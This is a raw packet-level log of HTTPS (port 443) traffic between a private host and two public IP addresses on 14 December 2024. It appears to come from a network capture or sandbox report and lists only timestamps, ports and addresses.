                                                                                                                                          Dec 14, 2024 14:00:23.832113981 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.832130909 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.832176924 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.837989092 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.838042974 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.838085890 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.838113070 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.838139057 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.838154078 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.845061064 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.845144987 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.845160007 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.845186949 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.845206022 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.845222950 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.852531910 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.852590084 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.852636099 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.852663994 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.852679014 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.852715015 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.888139963 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.888237000 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.888323069 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.888355017 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:23.888375998 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:23.888401985 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.002269983 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.002336979 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.002362013 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.002393007 CET44349711151.101.193.137192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:24.002412081 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.002432108 CET49711443192.168.2.12151.101.193.137
                                                                                                                                          Dec 14, 2024 14:00:24.008519888 CET44349711151.101.193.137192.168.2.12
Dec 14, 2024 14:00:24.008575916 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.008613110 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.008641005 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.008661032 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.008672953 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.016062975 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.016124010 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.016180992 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.016211033 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.016227007 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.016249895 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.023478031 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.023530006 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.023643970 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.023670912 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.023690939 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.023715019 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.029998064 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.030064106 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.030128002 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.030153036 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.030167103 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.030196905 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.037936926 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.037970066 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.038068056 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.038098097 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.038140059 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.044403076 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.044439077 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.044585943 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.044612885 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.044661045 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.081800938 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.081835985 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.081954002 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.081981897 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.082030058 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.193974018 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.194046974 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.194087029 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.194161892 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.194200039 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.194222927 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.200514078 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.200567961 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.200607061 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.200670958 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.200707912 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.200731993 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.207906008 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.207952976 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.207999945 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.208028078 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.208045959 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.208066940 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.215946913 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.216003895 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.216093063 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.216120958 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.216137886 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.216166973 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.221932888 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.221986055 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.222022057 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.222052097 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.222065926 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.222095013 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.229921103 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.229968071 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.230015039 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.230043888 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.230062962 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.230082035 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.236454964 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.236506939 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.236541986 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.236573935 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.236588955 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.236619949 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.273786068 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.273838043 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.273979902 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.274020910 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.274040937 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.274066925 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.385874987 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.385900974 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.386037111 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.386075020 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.386145115 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.392400026 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.392419100 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.392493963 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.392515898 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.392554998 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.400233984 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.400285959 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.400316954 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.400336027 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.400351048 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.400374889 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.407330990 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.407360077 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.407422066 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.407432079 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.407458067 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.407474995 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.413870096 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.413903952 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.413958073 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.413969040 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.414009094 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.421875954 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.421901941 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.421988010 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.421994925 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.422030926 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.428347111 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.428364038 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.428544998 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.428553104 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.428606033 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.465936899 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.465962887 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.466028929 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.466059923 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.466090918 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.466113091 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.585263014 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.585328102 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.585361958 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.585396051 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.585414886 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.585437059 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.591634989 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.591665983 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.591753960 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.591784000 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.591825008 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.599520922 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.599555969 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.599608898 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.599639893 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.599654913 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.599689007 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.604598045 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.604652882 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.604692936 CET | 443 | 49711 | 151.101.193.137 | 192.168.2.12
Dec 14, 2024 14:00:24.604696989 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.604788065 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:24.608669043 CET | 49711 | 443 | 192.168.2.12 | 151.101.193.137
Dec 14, 2024 14:00:41.107305050 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:41.107368946 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:41.107451916 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:41.108634949 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:41.108649969 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.417979002 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.418421984 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:42.423312902 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:42.423345089 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.423677921 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.439101934 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:42.479355097 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.871248960 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.871329069 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.871403933 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.871436119 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.871464968 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.871469975 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:42.871503115 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
Dec 14, 2024 14:00:42.871536970 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:42.871562004 CET | 49719 | 443 | 192.168.2.12 | 104.21.84.67
Dec 14, 2024 14:00:42.879689932 CET | 443 | 49719 | 104.21.84.67 | 192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.888243914 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.888309002 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.888330936 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.934525967 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.934566021 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:42.979867935 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:42.991204023 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.042464972 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.042505026 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.067334890 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.067471027 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.067497015 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.076561928 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.076601982 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.076651096 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.076677084 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.076731920 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.084558010 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.092710972 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.092750072 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.092824936 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.092853069 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.092895985 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.100712061 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.108767033 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.108829021 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.108854055 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.116744995 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.116806984 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.116832972 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.124596119 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.124664068 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.124672890 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.132579088 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.132699013 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.132704973 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.145570993 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.145683050 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.145683050 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.145714045 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.145766020 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.152141094 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.198602915 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.255373955 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.257615089 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.257725954 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.257756948 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.264225006 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.264276028 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.264328957 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.264355898 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.264425039 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.273777962 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.273791075 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.273895979 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.282419920 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.282433033 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.282500029 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.286665916 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.286727905 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.295258999 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.295269966 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.295383930 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.299674034 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.299746037 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.308386087 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.308449030 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.317006111 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.317075968 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.325664997 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.325758934 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.329966068 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.330041885 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.338551044 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.338617086 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.342858076 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.342921019 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.351541996 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.351600885 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.447632074 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.447726965 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.449440002 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.449507952 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.456269979 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.456393003 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.462899923 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.462990046 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.469377995 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.469454050 CET49719443192.168.2.12104.21.84.67
                                                                                                                                          Dec 14, 2024 14:00:43.472491026 CET44349719104.21.84.67192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:43.472564936 CET49719443192.168.2.12104.21.84.67
